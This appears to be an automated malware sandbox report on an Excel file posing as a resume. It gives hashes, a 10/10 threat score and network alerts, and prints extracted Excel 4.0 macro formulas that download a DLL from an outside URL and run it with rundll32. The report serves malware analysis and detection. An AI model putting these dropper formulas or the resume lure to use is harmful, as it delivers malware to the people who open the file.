Overview

overview

10

Static

static

10

William Sm...me.xls

windows7_x64

10

William Sm...me.xls

windows10-2004_x64

10

Resubmissions

10-04-2022 07:53

220410-jq25nsgaen 10

10-04-2020 08:18

200410-tmzpvazbjn 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    William Smith Resume.xls

  • Size

    163KB

  • Sample

    220410-jq25nsgaen

  • MD5

    0a054818926d97f4100774255a908dba

  • SHA1

    de572eddd30b34d1e328c8d5fb986cc1e04c82e8

  • SHA256

    0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2

  • SHA512

    21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

Score
10/10
suricataxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://march262020.com/files/april8.dll

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://march262020.com/files/april8.dll","C:\ProgramData\ieTneVi.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\ieTneVi.dll,DllRegisterServer",0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://march262020.com/files/april8.dll

Targets

    • Target

      William Smith Resume.xls

    • Size

      163KB

    • MD5

      0a054818926d97f4100774255a908dba

    • SHA1

      de572eddd30b34d1e328c8d5fb986cc1e04c82e8

    • SHA256

      0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2

    • SHA512

      21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

    Score
    10/10
    suricata

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

      suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

      suricata
    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks